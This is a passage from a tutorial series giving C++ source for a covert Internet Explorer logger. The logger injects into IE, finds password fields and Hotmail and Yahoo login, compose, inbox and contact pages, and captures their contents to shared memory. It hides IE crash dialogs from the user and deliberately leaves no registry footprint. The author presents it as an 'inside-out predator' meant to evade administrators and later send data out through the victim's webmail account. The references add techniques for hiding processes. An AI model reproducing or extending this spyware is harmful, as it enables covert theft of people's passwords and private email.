  //4 Byte Total size 4 byte Used size
  DWORD pos = 0;
  pView = MapViewOfFile(hMMF, FILE_MAP_READ |
                        FILE_MAP_WRITE, 0, 0, 0);
  if(pView == NULL) err;

  LPBYTE lpByte = (LPBYTE)pView;
  DWORD dwSize, dwUsed;

::CopyMemory(&dwSize, lpByte, sizeof(DWORD));
                          lpByte += sizeof(DWORD);

::CopyMemory(&dwUsed, lpByte, sizeof(DWORD));
                          lpByte += sizeof(DWORD);

  LPVOID lpMem = (LPVOID)lpByte;    //Actual Data Head
  if(dwType == WM_WPARAM_QUERY_HTML)

{
  MSHTML::IHTMLElementPtr spHtmlElement;
  HRESULT hr = g_lpHTMLDocument2[dwIndex]->
  get_body(&spHtmlElement);
if(spHtmlElement != 0)

{
  BSTR bstr;
  hr = spHtmlElement->get_outerHTML(&bstr);
  UINT len = ::SysStringLen(bstr);
  //We use Unicode here, so I cast directly
  lpByte = (LPBYTE)lpMem;
  lpByte += dwUsed;

::CopyMemory(lpByte, (LPVOID)(LPCWSTR)bstr,
             len*sizeof(TCHAR));
             dwUsed += len*sizeof(TCHAR);

::SysFreeString(bstr);    //Free It!!!!
  lpByte = (LPBYTE)lpMem;
  lpByte += dwUsed;

::CopyMemory(lpByte, (LPVOID)(LPCWSTR)_T("\r\n"),
  ::lstrlen(_T("\r\n"))*sizeof(TCHAR));
  dwUsed += ::lstrlen(_T("\r\n"))*sizeof(TCHAR);

}

}

else if(dwType == WM_WPARAM_QUERY_URL)

{
  BSTR bstr;
  HRESULT hr = g_lpHTMLDocument2[dwIndex]->
  get_url(&bstr);
  //We use Unicode here
  UINT len = ::SysStringLen(bstr);
  lpByte = (LPBYTE)lpMem;
  lpByte += dwUsed;

::CopyMemory(lpByte, (LPVOID)(LPCWSTR)bstr,
  len*sizeof(TCHAR));
  dwUsed += len*sizeof(TCHAR);

::SysFreeString(bstr);
  lpByte = (LPBYTE)lpMem;
  lpByte += dwUsed;

::CopyMemory(lpByte, (LPVOID)(LPCWSTR)_T("\r\n"),
  ::lstrlen(_T("\r\n"))*sizeof(TCHAR));
  dwUsed += ::lstrlen(_T("\r\n"))*sizeof(TCHAR);

}
  lpByte = (LPBYTE)pView;
  lpByte += sizeof(DWORD);

::CopyMemory(lpByte, &dwUsed, sizeof(DWORD));

::UnmapViewOfFile(pView);

::CloseHandle(hMMF);

::CloseHandle(hWriteEvent);

::SetEvent(hReadEvent);

::CloseHandle(hReadEvent);

return TRUE;
}

//from tlb
//struct __declspec(uuid("626fc520-a41e-11cf-a731-00a0c9082637"))
///* dual interface */ IHTMLDocument;
//struct __declspec(uuid("332c4425-26cb-11d0-b483-00c04fd90119"))
///* dual interface */ IHTMLDocument2;

//Link Handle With IHTMLDocument2, Event
BOOL LinkCom(DWORD dwIndex)
{
  if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
  AntiLinkCom(dwIndex);

  CoInitialize( NULL );
  // Explicitly load MSAA so we know if it's installed
  HINSTANCE hInst = ::LoadLibrary( _T("OLEACC.DLL") );
  if(hInst == NULL ) return FALSE;

  MSHTML::IHTMLDocument2Ptr spHtmlDocument;
  LRESULT lRes;

  UINT nMsg =  ::RegisterWindowMessage( _T("WM_HTML_GETOBJECT") );
  //Time Out: 1 Second

::SendMessageTimeout( g_hBrowserWnd[dwIndex], nMsg,
                      0L, 0L, SMTO_ABORTIFHUNG, 1000,
                      (DWORD*)&lRes );

  LPFNOBJECTFROMLRESULT pfObjectFromLresult =
                        (LPFNOBJECTFROMLRESULT)
  ::GetProcAddress( hInst, "ObjectFromLresult");

if ( pfObjectFromLresult == NULL )

{

::FreeLibrary( hInst );
  CoUninit ialize();

return FALSE;

}

  WCHAR strDoc[] = L"{626fc520-a41e-11cf-a731-00a0c9082637}";
  CLSID uuidDoc;
  HRESULT hrDoc = CLSIDFromString((LPOLESTR)strDoc,

&uuidDoc     //IID_IHTMLDocument2

);
  if(FAILED(hrDoc)) err;
  HRESULT hr;

hr = (*pfObjectFromLresult)( lRes, uuidDoc,
  //IID_IHTMLDocument2,
0, (void**)&spHtmlDocument );

if ( SUCCEEDED(hr) )

{

g_lpHTMLDocument2[dwIndex] = (spHtmlDocument);
  CComQIPtr<IServiceProvider> isp = spHtmlDocument;

hr = isp->QueryService(IID_IWebBrowserApp,
                         IID_IWebBrowser2,
                         (void**)&g_lpWeb2[dwIndex]);
  if(FAILED(hr))

{
  g_lpHTMLDocument2[dwIndex].Release();    //not use ->
  g_lpHTMLDocument2[dwIndex] = NULL;
  g_lpWeb2[dwIndex]          = NULL;

::FreeLibrary( hInst );
  CoUninitialize();

return FALSE;

}

else

{
  g_event.SetSource(g_lpWeb2[dwIndex] ,dwIndex);
  g_event.ConnectEvents(dwIndex);
}

}

else

{

::FreeLibrary( hInst );
  CoUninitialize();

return FALSE;

}


::FreeLibrary( hInst );
  CoUninitialize();

return TRUE;
}

BOOL AntiLinkCom(DWORD dwIndex)
{

if(g_lpHTMLDocument2[dwIndex] != NULL)

{
  g_lpHTMLDocument2[dwIndex].Release();    // not use ->
  g_lpHTMLDocument2[dwIndex] = NULL;
}
  g_event.ExitEvents(dwIndex);

if(g_lpWeb2[dwIndex] != NULL)

{
g_lpWeb2[dwIndex].Release();    //NOTE: not use ->
g_lpWeb2[dwIndex] = NULL;
}

return TRUE;
}

//Inside the HTML, there is a Password Field
BOOL WINAPI IsPwdBrowser(DWORD dwIndex)
{
if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
  LRESULT hr = ::SendMessage(g_hBrowserWnd[dwIndex],
                             WM_QUERY_BROWSER,
                             WM_WPARAM_CHECK_ISPWD,dwIndex);
if(hr != 0)
return TRUE;

return FALSE;
}

BOOL InterIsPwdBrowser(DWORD dwIndex)
{

if(g_lpHTMLDocument2[dwIndex] == NULL)

{
  if(!LinkCom(dwIndex)) return FALSE;
}

  MSHTML::IHTMLElementCollection *pForm;
  HRESULT hr = g_lpHTMLDocument2[dwIndex]->
  get_all(&pForm);
  if(FAILED(hr)) return FALSE;

long len;

hr = pForm->get_length(&len);
if(FAILED(hr)) return FALSE;
for(int i = 0; i < len; i++)

{
  LPDISPATCH lpItem = pForm->
  item(CComVariant(i), CComVariant(i));    //Atlbase.h

  MSHTML::IHTMLInputElementPtr lpInput;
  HRESULT hr = lpItem->QueryInterface(&lpInput);
  if(FAILED(hr)) continue;


_bstr_t type(_T("password"));
  if(lpInput->Gettype() == type)

{
  pForm->Release();
  pForm = NULL;
  return TRUE;
}

}
  pForm->Release();
  pForm = NULL;

return FALSE;
}

//Some pre-defined site, such as the following
BOOL WINAPI IsPreDefBrowser(DWORD dwIndex)
{
  if(g_hBrowserWnd[dwIndex] == NULL) return FALSE;
  HRESULT hr = ::SendMessage(g_hBrowserWnd[dwIndex],
                             WM_QUERY_BROWSER,
                             WM_WPARAM_CHECK_ISPREDEF,dwIndex);
  if(hr != 0)
return TRUE;

return FALSE;
}

enumPreDefinePage InterIsPreDefBrowser(DWORD dwIndex)
{

if(g_lpHTMLDocument2[dwIndex] == NULL)

{
  if(!LinkCom(dwIndex)) return none;

}
  BSTR bstr;
  HRESULT hr = g_lpHTMLDocument2[dwIndex]->get_url(&bstr);

  //We use Unicode here
  UINT len = ::SysStringLen(bstr);
  int dim = sizeof(szTargetUrl)/sizeof(szTargetUrl[0]);
  enumPreDefinePage bRet = none;
  for(int i = 0; i < dim; i++)

{
  //URL wildcard comparison
  if(::WildCompare((LPTSTR)(LPCTSTR)bstr, len,
                   (LPCTSTR)szTargetUrl[i]) != -1)

{
  bRet = (enumPreDefinePage)i;

break;

}

}

::SysFreeString(bstr);

return bRet;
}

DWORD WINAPI QueryBrowserState(DWORD dwIndex)
{

return g_dwBrowserState[dwIndex];
}

BOOL Trigger(DWORD dwIndex)
{
  //Decide Detail Type of the Current Homepage and
  //Parse its Html to MMF
  enumPreDefinePage type = InterIsPreDefBrowser(dwIndex);
  if(type != none || InterIsPwdBrowser(dwIndex))

{
  //Open MMF

HANDLE hMMF, hWriteEvent, hReadEvent;
  LPVOID pView = NULL;

  hMMF = OpenFileMapping(FILE_MAP_READ |
                         FILE_MAP_WRITE,
                         FALSE, g_MMF_NAME);

if (hMMF == NULL) err;
  hWriteEvent = ::OpenEvent(EVENT_ALL_ACCESS,
                            FALSE,g_WRITE_EVENT_MMF_NAME);
if(hWriteEvent == NULL) err;
  hReadEvent = ::OpenEvent(EVENT_ALL_ACCESS,
                           FALSE,g_READ_EVENT_MMF_NAME);
if(hReadEvent == NULL) err;

  DWORD dwRet = ::WaitForSingleObject(hWriteEvent, MAX_WAIT);
  if(dwRet == WAIT_ABANDONED) err;

else if(dwRet == WAIT_TIMEOUT) err;

::ResetEvent(hWriteEvent);

  //4 Byte Total size
  //4 byte Used size
  DWORD pos = 0;
  //head 4 byte to record size
  pView = MapViewOfFile(hMMF,
                        FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
  if(pView == NULL) err;

  LPBYTE lpByte = (LPBYTE)pView;
  DWORD dwSize, dwUsed, dwInfo;

::CopyMemory(&dwSize, lpByte, sizeof(DWORD));
  lpByte += sizeof(DWORD);

::CopyMemory(&dwUsed, lpByte, sizeof(DWORD));
  lpByte += sizeof(DWORD);

  LPBYTE lpMem = (LPBYTE)lpByte;    //Actual Data Head
  //================ gg
  switch(type)

{

case hotmailInbox:

HandleHotmailInbox(g_lpHTMLDocument2[dwIndex],
  lpMem, dwSize, dwUsed, dwInfo);

break;

case hotmailCompose:

HandleHotmailCompose(g_lpHTMLDocument2[dwIndex],
  lpMem, dwSize, dwUsed, dwInfo);

break;

case hotmailLogin:

HandleHotmailLogIn(g_lpHTMLDocument2[dwIndex],
                   lpMem, dwSize, dwUsed, dwInfo);

break;
  //.......
  //hotmailLogError, hotmailContacts, hotmailChangePassword,
  //hotmailChangeAnswer, hotmailForgotPassword,
  //hotmailReadMail, yahooInbox, yahooCompose, yahooLogin,
  //yahooLogError, yahooContacts, yahooChangePassword.....

default:    //password page

HandlePasswordPage(g_lpHTMLDocument2[dwIndex],
                   lpMem, dwSize, dwUsed, dwInfo);

break;

}
  //close MMF, mark read OK...

}

else

return FALSE;

return TRUE;
}

An interesting Brain Exercise—Parse Online Page:

Let’s see how to accomplish Step 7b—parse a page written by others. Take as a sample, Hotmail’s Compose page. For your convenience, I attach the screen shot of it.

Figure 3.7: Screen Shot of Hotmail Compose Page

So, what are the key points on this page? I think all of you can guess out all of them. That’s it—To, CC, BCC, Subject, and Mail Body. I highly suggest you play this page with the HtmlPeek program I enclosed with this program. Input www.hotmail.com in the edit area on the toolbar, click the navigate button, log in using your account, click the magnifying glass-like button to dump the HTML element, and you will have the result in the right view similar to this:

RS $$$ hidden $$$ CHECKED
Form $$$ hidden $$$ HM
cp $$$ hidden $$$ 1252
v $$$ hidden $$$ 1
q $$$ text $$$
 $$$ image $$$
sigtext $$$ hidden $$$
replytext $$$ hidden $$$
drafttext $$$ hidden $$$
curmbox $$$ hidden $$$ F000000001
_HMaction $$$ hidden $$$
subaction $$$ hidden $$$
plaintext $$$ hidden $$$
login $$$ hidden $$$ codetiger
wcid $$$ hidden $$$
soid $$$ hidden $$$
msg $$$ hidden $$$
start $$$ hidden $$$
len $$$ hidden $$$
attfile $$$ hidden $$$
type $$$ hidden $$$
src $$$ hidden $$$
ref $$$ hidden $$$
ru $$$ hidden $$$
wysiwyg $$$ hidden $$$
msghdrid $$$ hidden $$$ 931fb080ed04531ce1bca7ac9f2f61f4_1039376788
RTEbgcolor $$$ hidden $$$
sigflag $$$ hidden $$$
newmail $$$ hidden $$$ new
to $$$ text $$$
$mostContactPerson1 $$$ hidden $$$ people1@abc.com
$mostContactPerson2 $$$ hidden $$$ people2@abc.com
$mostContactPerson3 $$$ hidden $$$ people3@abc.com
Quick.x $$$ button $$$ Show All
COMPOSE_X $$$ button $$$ Edit List
cc $$$ text $$$
bcc $$$ text $$$
subject $$$ text $$$
Attach.x $$$ submit $$$ Add/Edit Attachments
<SELECT class=drpdwn title=”Tools for composing messages” onchange=DT(this[selectedIndex].value)
name=tools> <OPTION value=”” selected>Tools<OPTION value=SpellChk>Spell
Check<OPTION value=Dictionary>Dictionary<OPTION
value=Thesaurus>Thesaurus<OPTION value=RTE>Rich-Text Editor
ON</OPTION></SELECT>
outgoing $$$ checkbox $$$ on
Send.x $$$ submit $$$ Send
Save.x $$$ submit $$$ Save Draft
Cancel.x $$$ submit $$$ Cancel
body $$$ textarea $$$

Send.x $$$ submit $$$ Send
Save.x $$$ submit $$$ Save Draft
Cancel.x $$$ submit $$$ Cancel

Figure 3.8: Page Element Layout of Hotmail Compose Page

Make sense? What we need do is to get the three elements and their value and write to the logger. It may be more important than you estimated at first. Usually, the “Compose New Mail” page of Hotmail itself will be 25-32 Kb even if you write nothing inside the page. Usually, people only write a few kilobytes of text in the mail body, say, 5 Kb. If you dump the HTML without processing (filtering) here, after sending 10 online mails, your data will be approximately (5 + 25~32)kb * 10 = 300~370kb versus our cute 5kb * 10 = 50kb. The logger alonewill save so much network traffic in the real world.

Here is the code:

BOOL HandleHotmailComposePage(
     MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem,
     DWORD& dwSize, DWORD& dwUsed,
     DWORD& dwInfo)
{
  //lpMem is the starting pointer of our MMF
  LPBYTE lpByte = lpMem;
  lpByte += dwUsed;

  //Write System Time
  SYSTEMTIME tm;
  ::GetLocalTime(&tm);
  TCHAR sz[256];    //seems enough
  _stprintf(sz, _T("\r\n>>>>>Hotmail Compose Page
            %d/%d/%d,%d:%d:%d\r\n"),  tm.wYear, tm.wMonth,
            tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
  DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
  ::CopyMemory(lpByte, sz, dwDisp);
  dwUsed += dwDisp;

  MSHTML::IHTMLElementCollection *pCollection;
  HRESULT hr = pDoc->get_all(&pCollection);
  if(FAILED(hr)) return FALSE;
  long len;
  hr = pCollection->get_length(&len);
  if(FAILED(hr)) return FALSE;

  for(int i = 0; i < len; i++)
  {LPDISPATCH lpItem = pCollection->item(CComVariant(i),
                                            CComVariant(i));
  //Parse INPUT and TEXTAREA
  //We neen INPUT: to, cc, bcc, subject
  // TEXTAREA: body
  MSHTML::IHTMLInputElementPtr lpElement;
  HRESULT hr = lpItem->QueryInterface(&lpElement);
  if(SUCCEEDED(hr))
  {
  _bstr_t name = lpElement->Getname();
  _bstr_t type = lpElement->Gettype();
  _bstr_t value = lpElement->Getvalue();

  _bstr_t text(_T("text"));
  _bstr_t to(_T("to"));
  _bstr_t cc(_T("cc"));
  _bstr_t bcc(_T("bcc"));
  _bstr_t subject(_T("subject"));
    if(type == text)

{
  if(name == to || name == cc ||
     name == bcc || name == subject)
   HandlePageElement(lpMem, dwSize,
                     dwUsed, (LPCTSTR)type,
                     (LPCTSTR)name,(LPCTSTR)value);
}
}

  //Parse TextArea
  MSHTML::IHTMLTextAreaElementPtr lpArea;
  hr = lpItem->QueryInterface(&lpArea);
  if(SUCCEEDED(hr))
  {
    _bstr_t name = lpArea->Getname();
    _bstr_t type = lpArea->Gettype();
    _bstr_t value = lpArea->Getvalue();
    _bstr_t textarea(_T("textarea"));
    _bstr_t body(_T("body"));
      if(type == textarea && name == body)

{
  HandlePageElement(lpMem, dwSize, dwUsed,
  (LPCTSTR)type, (LPCTSTR)name,(LPCTSTR)value);
}

}

  }    //end for loop
  pCollection->Release();
  pCollection = NULL;
  return TRUE;
}

Game Not Over Yet

When I started to write this series in this summer, I picked my former logger EXE directly and launched it, but found it did not work correctly on an online page. At first I thought my code was out-dated to today’s IE. After inserting a few Message Boxes in the DLL, I realized that MSN reformed their URL layout some time earlier this year. For example, the Inbox page of Hotmail (the page containing the mail listed in Inbox) used to be “http://*.hotmail.msn.com/cgi-bin/getmsg*” while now it is “http://*.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=*“, but I am very glad that inside each page the HTML element layout did not change much, so I updated the code in one weekend morning. You can experiment with my program by launching it first, and then, launching an IE, log in to Hotmail using your account information, view the coming message, compose and send message, view your contact list, change your password and secret answer. Now, have a look at my “Apparition.”

Figure 3.9: Screen Shot of “Apparition” showing a user reading Hotmail

But, another on-line mail systemÿYahoo!, is really a headache, just as I mentioned above. Individual local Yahoo! accounts developed their page layout completely differently. So, if you really want to make an omnipotent Yahoo! mail program, you have to check all Yahoo! branch companies (maybe two dozen of them around the world) and write handler code for all of them, which is actually a labor in programming. My program only deals with www.yahoo.com (so not the www.yahoo.co.jo, www.tw.yahoo.com, www.sg.yahoo.com, etc…. Just see their inconsistent names!) and do not ask me for more handlers for you already have enough information to make a new handler yourself.

Something Not Finished

I have to admit that sometimes (not all the time!!!, which exaggerate the difficulties to locate the bug), after launching this logger, the IE is easy to crash when you CLOSE it. For IE6 users, it looks like this:

Figure 3.10: IE6.0 crashed effected by “Apparition.” It is “dw15 -x -s 340” (from Process Explorer), while the process name from ToolHelp is “_dw15.exe”!!??

It is so strange that you always get the same IHTMLDocument2 pointer when you are using it in your dialog or Form View-based application. But, caching this kind of pointer in a DLL (injected into remote IE) share section is a painstaking job. From time to time, I found this pointer just mutated into a simple IDispatch, and asking for IHTMLDocument2 from it will return a NULL accordingly. MSDN Kb Q249232 “HOWTO: Get IHTMLDocument2 from a HWND” says that you get a fully marshaled IHTMLDocument2 pointer from the window handle, and the sample code inside this KB runs well because it is used just once. Our logger will definitely avoid the “GP Error” dialog as much as possible.

Oh, BTW, the crash-helper dialog actually resides in a “DW15.exe” EXE that is in the same place as “IExplorer.exe”. You can verify it by opening your “C:\Program Files\Internet Explorer” folder. I recommended you open this EXE with the “Resource Hacker” tool I listed in the References section. You will see that the MS IE team guys use this dialog base to provide the user with several choices before the troublesome IE process REALLY exits.

Figure 3.11: Dialog Template Resource inside DW15.exe (Peeked by “Resource Hacker”)

The ultimate solution to this crash bug is NOT available yet, and up to now I use an indirect way; that is, to use a brutal, forced way to hide the crash dialog from the user, and push the “Do not Send” button by code. You can refer to this article: Automated IE SaveAs MHTML (http://www.codeproject.com/shell/iesaveas.asp) By Stephane Rodriguez. Anyway, if there are any eagle eyes who can find the mysterious crash reason, it will be much better. Oh, I almost forgot, BTW, although every folder window opened in Windows includes “Internet Explorer_Server” (inside which a list view resides), they are much less troublesome than IE, so handling the IE crash dialog DOES make sense!

Refer to the following figure:

Figure 3.12: Windows Layout of IE Crash Dialog

We handle the HCBT_ACTIVATE instead of HCBT_CREATEWND this time because I found that the RichEdit20W child is not ready yet when HCBT_CREATEWND runs. We hide or move the dialog out of screen, uncheck the “Restart Microsoft Internet Explorer”, and then use the “Don’t Send” button to mimic the user ending the dialog.

The code is very short, so I list it here:

LRESULT CALLBACK CBTProc(
int nCode,        // hook code
WPARAM wParam,    // depends on hook code
LPARAM lParam     // depends on hook code
)
{
  if(nCode == HCBT_ACTIVATE)
  {
    if(IsIECrashDialog((HWND)wParam))
    {
      HandleIECrashDialog((HWND)wParam);
    }
  }
  ..............

BOOL IsIECrashDialog(HWND hWnd)
{
  TCHAR szClassName[64];
  int nRet = GetClassName(hWnd, szClassName, 64);
  if(nRet == 0) return FALSE;
  szClassName[nRet] = 0;
   //Dialog's Class Name is "#32770"
  if(::lstrcmpi(szClassName, _T("#32770")) != 0)
    return FALSE;
  //hWnd is a dialog
  //have 4 buttons (including 1 check box) and a RichEdit20W
  HWND hRich = ::FindWindowEx(hWnd, NULL,
                              _T("RichEdit20W"), NULL);
  if(!hRich) return FALSE;
  HWND hButton = ::FindWindowEx(hWnd, NULL,
                                _T("Button"), NULL);
  if(!hButton) return FALSE;
  //HWND-->ProcessID-->Exe name
  DWORD dwPID;
  GetWindowThreadProcessId(hWnd, &dwPID);
  CToolhelp th(TH32CS_SNAPALL, dwPID);
  // Show Process details
  PROCESSENTRY32 pe = { sizeof(pe) };
  BOOL fOk = th.ProcessFirst(&pe);
  for (; fOk; fOk = th.ProcessNext(&pe))
  {
    if (pe.th32ProcessID == dwPID)
    {
      //Zhefu Zhang does not understand why it is _DW15.exe
      //instead of DW15.exe (exe file name)
      if(::lstrcmpi(pe.szExeFile, _T("_DW15.exe")) == 0)
        return TRUE;
      else
         return FALSE;
      break;    // No need to continue looping
    }
   }
  return FALSE;
}

BOOL HandleIECrashDialog(HWND hWnd)
{
  //::ShowWindow(hWnd, SW_HIDE);
  //::MoveWindow(hWnd, -2000, 0, 100, 100, FALSE);
  //Find Check Button, UnCheck It
  HWND hChild = ::FindWindowEx(hWnd, NULL,
                               _T("Button"), NULL);
  while(hChild)
  {
    //Check Box?
    LONG_PTR lStyle = ::GetWindowLongPtr(hChild,
                                         GWL_STYLE);
    if((BS_CHECKBOX & lStyle) == BS_CHECKBOX)
    {
      //uncheck it
      ::SendMessage(hChild, BM_SETCHECK,
                    BST_UNCHECKED, 0);
    }
    hChild = ::FindWindowEx(hWnd, hChild,
                            _T("Button"), NULL);
    }
  //Find "Don't Send" it is the right-most button OR
  //the first child button, Check this code when you are using
  //other languages than English with Windows
   hChild = ::FindWindowEx(hWnd, NULL,
                           _T("Button"), NULL);
    DWORD btnID = ::GetWindowLong(hChild, GWL_ID);
                  ::SendMessage(hWnd, WM_COMMAND,
                                (WPARAM)MAKELONG((WORD)btnID,
                                 BN_CLICKED),
                                 (LPARAM)hChild);
    return TRUE;
}

Ok, man. We have successfully quenched the “IE crash dialog.” Although it is overkill, we have no choice. Enjoy being logged! This is the end of IE hooking today.

Miscellaneous and FAQ:

Q1. What if I use the onsubmit(of HTMLFormElementEvents) event instead of BeforeNavigate2 (of DWebBrowserEvents2) event to trigger the page reading?

A1. You can do that if you only take care with the form-based data. Actually, it was my first try when making this logger on IE. But, one thing; usually, your form will NOT exist upon “submission” because you submit to navigate to another page. So, each time you navigate to a new page, you have to parse the page to see whether a form is there, and remember to release the old form COM pointer in time. It is too complicated, and you see that the main purpose of your doing this is to find the password input area on the form; and now I parse the whole page and will not miss it. Still, if you like this way, you can make cool code anyway. For green hands, I suggest a reading on the source code of one MFC sample “MFCIE”; it should be reachable in online MSDN. It will dump the various events from a browser and give you a start on IE coding.

Q2. I hooked IE to get all mouse clicks and hope that, by doing this, I could get the event “user click submit button”. Is that okay?

A2. First, I do not blame MS the IE developer team; they did a good job to ship a first-class browser to users. But, compared to other Windows parts, DHTML or MSHTML (I don’t care the name, it is just a COM object for parsing HTML or whatever) is not only unstable, but also easy to crash due to the unsolvable deficiency of the script-driven stuff. If you guy is a fast hand (especially those having experience with online war games such as Red Alert or Startcraft), you will lose at least one mouse click out of 100 (if not 500) on an IE browser; if your CPU is busy, it will be higher, almost definitely. So DO NOT LINK a mouse windows message (ex. WM_LBUTTONDOWN) to any DHTML event; use the latter only when you play DHTML. Refer to “Programming Internet Explorer 5.0” (MS Press, 1999) for details.

Q3. I want to use your program in my Windows 9x/ME!

A3. I have taken care in programming already, everywhere in the code, you will see TCHAR- and lstrcpy-like code only. Change the preprocessor definitions from “_UNICODE, UNICODE” to “_MSCS”, get rid of link output “wWinCRTStartup” in the GUI end, and change all cast code like this:

BSTR bstrNickName;
//some text query
_stprintf(sz, _T("%s\t\r\n"), (LPCTSTR)bstrNickName);
to
BSTR bstrNickName;
//some text query
char* pBuffer;
//WideCharToMultiByte from bstr to char, refer MSDN,
//take care of buffer length!
_stprintf(sz, _T("%s\t\r\n"), (LPCTSTR)pBuffer);

I think you will go after this modification. I have no intention to write any code for Win9x because it is three years old.

Q4. Why not use BHO?

A4. Oh, just because it is a logger and I do not want to touch that part of the Registry to add its footprints. BHO does save you from hooking such a long way to get the page, so if you want decrease your coding time/work load and want to interact with IE pages aboveboard, use BHO.

Q5. I am an eagle-eye COM guru and I found one strange thing: In your code, you call CoInitialize() and CoUninitialize() in your LinkCom function to get an IHTMLDocument2 pointer from the window handle. How could you still use this COM object after CoUninitialize() and even save it in the shared section???

A5. Good question, eagle-eye guys. I do it because I am 100% sure the IE thread has called CoInitializeEx already before I hooked my DLL into it. So, the COM library keeps on living there, before I release my COM object pointer and eject my DLL. Sure, you even need not to call them at all in the code.

Q6. Hi, Jeff. I think it is an overkill to intercept all Hotmail pages. If you have gotten the password successfully, why bother logging the inbox page? Besides, your logic will not prevent logging the same page twice when a user moves backward and forward.

A6. I agree with you in the second point only. Yes, when a user moves backward and forward, the same page will be logged twice or more. It is not a technical problem; you merely implement a cache of the Hotmail pages and compare them before saving them. BUT, you have to log the Inbox, Compose, and Mail page because they may be transient—the user may delete their mail or not save to the Sent box, and these pages disappear permanently. As one word, our current IE hooking is an inside-out predator.

Words to Readers

It is a key part in a logger to include this IE hooking functionality and parse it properly and efficiently on the fly. In all cases, the unnecessary information consists of most part of a Web page, and dumping the whole page will consume a lot of storage space and bandwidth wastefully. Do not get me wrong; if your logger has 1 Gb of network bandwidth available, cloning the whole hard disk and sending out the data is a better idea. Another cool thing is, in latter articles of this series, the logger will be running inside the IE instance and make network communication using the just-got on-line mail system account on the fly. Not only is it the smartest firewall, but also the smartest administers will not find it, unless, unless, using the sniffer to record all actual data. Surely, we have to devise even cooler code-lines to stop this… (to be continued).

Partial Reference and Brief Description

  1. Programming Applications for MS Windows, 4th Edition, by Jeffrey Richter, ISBN 1-57231-996-8, Microsoft Press, 1999. Look up its DLL, SEH, and Memory Management part.
  2. Inside DCOM, ASIN: 157231849X or Inside COM+ Base Services, by Guy Eddon and Henry Eddon, ISBN 0-7356-0728-1, 1999 Microsoft Press. Answers your every question on COM/DCOM/COM+ in theory. Cool++.
  3. Professional NT Services, by Kevin Miller, ISBN: B00005Y2AZ, Wrox Press, 1998. Everything related to NT Service: security, DB connection, COM server, etc…
  4. Programming Server-Side Applications for Microsoft Windows 2000, by Jeffrey Richter, Jason D. Clark, ISBN 0-7356-0753-2, Microsoft Press, 1999. A must-have book on backend server programming, plus a serious, terribly good, ready-to-go security code.
  5. Programming Windows Security, by Keith Brown, ISBN: 0201604426, Addison-Wesley Pub Co, 2000. Comprehensive and in-depth talking on Win2k security. Seems not suitable for beginners. I recommend reading book 4 before digging into this one. Another must-have book. http://www.develop.com/books/pws/errata.htm for updating
  6. Programming Microsoft Internet Explorer 5, by Scott Roberts, ISBN 0-7356-0781-8, Microsoft Press, 1999. The first and only book solely dedicated to IE programming as its name—DHTML, IE event handling with VB and VC++, BHO, and so on.
  7. Programming the Microsoft Windows Driver Model, by Walter Oney, ISBN 0-7356-0588-2, 1999. Former “Systems Programming for Windows 95” author, Oney gives a DDK course here. We will use a little DDK later in this series.
  8. Windows NT/2000 Native API Reference, by Gary Nebbett, ISBN: 1578701996, Que, 2000. A function signature list of ddk.h; you do not need it if you are smart enough to guess tons of strange naming conventions in ddk.h. We use it when doing API hooking.
  9. Debugging Applications, by John Robbins, ISBN 0-7356-0886-5, Microsoft Press, 2000. Get more information about exception handling besides the Programming Application for Windows and Programming the Microsoft Windows Driver Model books.
  10. API Hooking Revealed by Ivo Ivanov, 2002 Apr. Excellent milestone article covering hooking. Also, read his other two articles Single interface for enumerating processes and modules under NT and Win9x/2K (or http://www.codeproject.com/system/hooksys.asp) and Detecting Windows NT/2K process execution (or http://www.codeproject.com/threads/procmon.asp) . Hint: Take note on his reference list; it is a gold mine!
  11. Three Ways to Inject Your Code into Another Process (or http://www.codeproject.com/useritems/winspy.asp), by Robert Kuster. 2003 Feb. Excellent milestone article on remote inject
  12. Trapping CtrlAltDel;Hide Application in Task List on Win2000/XP, by Jiang Sheng, 2003 Apr. Shows how to hide a process (task) from the task manager. Although his English is not perfect (as he described in the first sentence), I recommend you at least dl (download) his code and have a try.
  13. “How to Trap CtrlAltDel Key Combination in Windows NT/2000/XP (without using GINA and keyboard driver technology,” by Weiwu Tan (slwqw@163.com), CSDN forum (Simplified Chinese Only) 2002. It may be temporarily here: http://www.csdn.net/develop/Read_Article.asp?Id=15645. Dl it asap. A creative article dealing with prohibiting Ctrl-Alt-Del by intercepting a hotkey on logging on to a desktop. You can read the code anyway even you have no knowledge of Simplified Chinese. (Type GINA in www.csdn.net; it will lead to the hyperlink.)
  14. Disabling Keys in Windows XP with TrapKeys by Paul DiLascia, MSDN Magazine September 2002.
  15. Escape from DLL Hell with Custom Debugging and Instrumentation Tools and Utilities by Christophe Nasarre, MSDN 2002 June. Detection and listing of all running processes and modules is the basis of logger detection, isn’t it? So, read this.
  16. http://www.sysinternals.com. Go there to dl a tool called “procexp.exe” to list all process on the fly. It is the site of the two authors of the cool book Inside Microsoft Windows 2000, by David A. Solomon and Mark Russinovich, ISBN 0-7356-1021-5, Microsoft Press, 2000
  17. Note: If your machine is slow or the CPU is busy, do not try to monitor MSN Messenger because it just makes your CPU busier to deadlock for a while. We will need this tool to scan an existing process later when talking about the detection of a logger.

  18. http://www.dependencywalker.com/. The latest version of our old friend, dependency.exe; it has been around this world since 1996. We will check the dependency of MSN Mesenger later in this series.
  19. http://www.users.on.net/johnson/resourcehacker/ Resource Hacker. I have been using this tool for quite a few years after I found I was tired of coding all resource type handlers myself. This tool will dump the rc file and the attached, say, bitmap resource to disk. The first time I used “procexp.exe” from www.sysinternals.com I was so curious why it is an EXE only, with a resource hacker. I found its driver SYS file is embedded inside the EXE. We will use same way to bundle our logger later.
  20. how to get current user password, (http://nfans.net/article/manu/26.html) by shotgun. You can read the code directly regardless of its Chinese title.
  21. http://www.geocities.co.jp/SiliconValley-PaloAlto/5333/index.htm (Japanese Only). A Japanese guy’s system coding sample page.
  22. http://www.codebase.nl/index.php/command/viewcode/id/127 Shows how to insert a menu item into the MSN Messenger; should be okay in MSN Messenger 6.0. The author’s language is not English, apparently, but luckily for us, the code is in English, so have a look at it.
